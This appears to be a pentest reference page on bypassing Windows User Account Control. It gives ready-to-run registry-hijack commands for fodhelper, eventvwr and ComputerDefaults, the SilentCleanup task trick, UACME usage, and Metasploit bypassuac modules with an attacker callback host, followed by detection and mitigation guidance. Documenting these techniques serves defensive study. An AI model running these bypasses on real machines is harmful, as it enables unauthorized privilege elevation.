UAC Bypass

Overview

User Account Control (UAC) prompts for consent when a process requires elevated privileges. Even local administrators run in a split-token model — a medium integrity token for normal operations and a high integrity token when elevation is approved. UAC bypass techniques allow a local admin to elevate to high integrity without triggering the UAC prompt. This is not a privilege escalation from standard user to admin — it is an integrity level elevation for users who are already local administrators.

ATT&CK Mapping

• Tactic: TA0004 - Privilege Escalation
• Technique: T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control

Prerequisites

• Shell access as a user who is a member of the local Administrators group
• Running at medium integrity (standard UAC-restricted context)
• UAC not set to "Always Notify" (highest setting blocks most bypasses)

Techniques

Identifying Integrity Level

:: Check current integrity level
whoami /groups | findstr /i "label"

:: Levels:
:: Mandatory Label\Medium Mandatory Level  — UAC-restricted (need bypass)
:: Mandatory Label\High Mandatory Level    — Elevated (already admin)
:: Mandatory Label\System Mandatory Level  — SYSTEM

Identifying UAC Configuration

:: Check UAC settings
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop

:: EnableLUA = 0 → UAC disabled (no bypass needed)
:: ConsentPromptBehaviorAdmin:
::   0 = Elevate without prompting
::   1 = Prompt for credentials on secure desktop
::   2 = Prompt for consent on secure desktop
::   3 = Prompt for credentials
::   4 = Prompt for consent
::   5 = Prompt for consent for non-Windows binaries (DEFAULT)

Fodhelper.exe Bypass

fodhelper.exe is an auto-elevating Microsoft binary (runs elevated without UAC prompt). It reads a registry key that an unprivileged user can control:

:: Set the registry key to execute our payload
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f

:: Trigger fodhelper — it reads the registry key and executes our command as high integrity
fodhelper.exe

:: Clean up
reg delete HKCU\Software\Classes\ms-settings /f

Eventvwr.exe Bypass

eventvwr.exe auto-elevates and queries HKCU\Software\Classes\mscfile\shell\open\command before falling back to the default handler:

:: Set registry key
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f

:: Trigger
eventvwr.exe

:: Clean up
reg delete HKCU\Software\Classes\mscfile /f

Note: This bypass was patched in Windows 10 Creators Update (build 15063, April 2017). It works on Windows 7, 8, 8.1, and Windows 10 pre-Creators Update.

ComputerDefaults.exe Bypass

:: Set registry key
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f

:: Trigger
ComputerDefaults.exe

:: Clean up
reg delete HKCU\Software\Classes\ms-settings /f

Disk Cleanup Bypass

Disk Cleanup (cleanmgr.exe) auto-elevates and runs scripts from a predictable location:

:: The elevated cleanmgr process loads DLLs from:
:: C:\Users\<user>\AppData\Local\Temp\<GUID>\
:: If you can predict or control this, DLL hijacking is possible

:: Alternative: use the scheduled task method
:: Disk Cleanup has a scheduled task that runs elevated
schtasks /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup"

UACME Framework

UACME is a collection of UAC bypass techniques compiled into a single tool:

:: UACME
:: https://github.com/hfiref0x/UACME
:: Specify bypass method number and payload
Akagi64.exe <method_number> C:\Users\Public\payload.exe

UACME documents 60+ bypass methods. Check the repository for which methods work on specific Windows versions.

Metasploit UAC Bypass

# From a Meterpreter session at medium integrity
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Check integrity
getuid
getsystem

# If getsystem fails, use UAC bypass modules
background
use exploit/windows/local/bypassuac_fodhelper
set SESSION <session_id>
set LHOST <attacker>
run

# Other UAC bypass modules
use exploit/windows/local/bypassuac_eventvwr
use exploit/windows/local/bypassuac_comhijack

Detection Methods

Network-Based Detection

• Not directly observable on the network

Host-Based Detection

• Monitor registry modifications to HKCU\Software\Classes\ms-settings\ and HKCU\Software\Classes\mscfile\
• Alert on auto-elevating binaries (fodhelper.exe, eventvwr.exe) spawning unexpected child processes
• Sysmon Event ID 13 — registry value changes in UAC-related keys
• Process creation events (Event ID 4688) showing high-integrity processes spawned from medium-integrity parents via auto-elevating binaries

Mitigation Strategies

• Set UAC to "Always Notify" — blocks most auto-elevation bypasses (ConsentPromptBehaviorAdmin = 2)
• Use standard user accounts — UAC bypass only works for local administrators; standard users are not affected
• Enable Credential Guard — protects against some token-based bypasses
• Monitor registry changes — alert on modifications to auto-elevation registry paths
• Application control — restrict execution of unexpected binaries

References

Official Documentation

• UACME

Pentest Guides & Research

• PayloadsAllTheThings - Windows Privilege Escalation

MITRE ATT&CK

• T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control